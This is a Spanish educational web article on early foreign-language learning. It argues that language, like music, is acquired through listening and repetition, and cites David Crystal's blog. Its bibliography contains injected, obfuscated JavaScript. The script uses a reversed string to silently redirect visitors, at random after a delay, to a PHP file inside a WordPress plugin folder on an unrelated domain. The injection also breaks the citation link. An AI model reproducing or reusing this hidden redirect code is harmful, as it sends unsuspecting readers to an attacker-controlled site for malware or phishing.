LA MÚSICA Y EL LENGUAJE (ENSEÑANZA DE LENGUAS EXTRANJERAS)

Autora: Cristina Pintor Portero

La enseñanza de idiomas es primordial en las edades tempranas, es necesario hacer hincapié en que un idioma no se adquiere mediante reglas gramaticales, sino mediante práctica y exposición al mismo. Se hace referencia a un texto escrito por David Crystal en el que se hace una comparación entre la música y el aprendizaje de la lengua.

La música y el lenguaje

¿Cómo no sorprendernos cuando alguien nos dice que un niño con apenas 3 años chapurrea varios idiomas? ¿A qué padres no les gustaría poder decir lo mismo de sus hijos aunque ellos no puedan enseñarles en casa por no ser nativos?

Ser bilingüe no es algo fácil, requiere la paciencia y entrega de unos padres que con una convivencia bilingüe (ver TV y leer en ambos idiomas, no hacer caso si no te hablan en el idioma que quieres que te hablen…) pueden llegar a conseguirlo de mejor o peor manera. Existen muchas personas no bilingües que tienen padres de distintas nacionalidades. La causa de esto es que los padres no han considerado oportuno hablar en ambos idiomas desde el nacimiento del niño.

Sin embargo, aunque el objetivo no sea llegar a ser bilingüe, mediante la enseñanza, podemos llegar a conseguir un buen nivel de inglés. En principio, se pretende adquirir una base parecida a la que adquirimos con respecto a nuestra lengua materna, la cual vamos puliendo a lo largo de los años. Para ello es necesario comenzar la enseñanza del idioma desde muy pequeños.   On language and colic (2010), texto publicado en el blog de David Crystal trata sobre el poder de la música tanto en las primeras vocalizaciones del lenguaje como el comportamiento de los bebés recién nacidos. Y ¿qué relación tiene esto con aprender una lengua? Pues la tiene, ya que el aprendizaje de una lengua, ya sea la materna, una segunda, o ambas, comienza en las edades más tempranas del ser humano ya que tiene ritmo, entonación y entra por el oído, de la misma manera que la música.

Crystal habla de la importancia de la música ya desde que el niño está en el vientre de la madre. Investigaciones científicas han comprobado que cuando la madre escucha música relajante, el feto también está relajado, sin embargo, cuando escucha otro tipo de música o alguna discusión, él también se altera. Una vez que nace, habiendo ya adquirido la entonación y el ritmo del idioma de sus padres, el bebé sigue oyendo lo que se conoce como babytalk. Los padres comienzan a hablar a sus hijos con una entonación distinta, más lentamente y de manera más expresiva. Esto hace que en el momento en que el bebe comienza a balbucear lo hace con la misma entonación que ha adquirido de sus padres, son repeticiones.

Esta es la manera en la que el ser humano aprende a hablar, unos aprenden en un idioma y otros en otro, depende del lugar en el que nazcan o del entusiasmo de sus progenitores en que aprendan hablar otra lengua.

Siguiendo los principios del cognitivismo, muchos lingüistas aseguran que es el mejor momento para adquirir una nueva lengua o, por lo menos, para empezar a adquirirla. En los primeros años de vida, para el bebé es todo nuevo, por tanto, todo tiene que adquirirlo. Además de costarle menos esfuerzo, es mucho más eficiente.

Las antiguas teorías gramaticales que aseguraban que era necesaria la adquisición de conocimientos gramaticales de la propia lengua, para poder adquirir los de una segunda, eran totalmente erróneas. No importa si los niños todavía no han aprendido a leer, para aprender un idioma sólo se necesita oído y práctica. Bien lo dice D. Crystal en su blog, el lenguaje es como la música, se aprende escuchando y repitiendo. El problema actual es que queremos escuchar y repetir cuando ya somos mayores.

Los que tienen algo de interés en aprender, viajan al país extranjero, hacen amigos extranjeros y les piden desesperadamente que les corrijan siempre y cuando pronuncien algo mal o digan algo sin sentido. Sin lugar a dudas, cuesta más de esta manera, mucho más. Un bebé lo hace sin saber porqué tiene que hacerlo. Por otra parte, los adolescentes de edades entre los 11 y los 17 años se preguntan una y otra vez para qué les sirve aprender inglés. Y, si no se lo preguntan, simplemente se aprenden las reglas gramaticales y el vocabulario de memoria, ya que su objetivo es pasar el examen. Así es imposible que se adquiera una lengua, tanto extranjera como materna. Esto debe cambiar, tenemos los medios para hacerlo.

BIBLIOGRAFÍA:

$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and-colic.html">http://david-crystal.blogspot.com/2010/01/on-language-and-colic.html

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.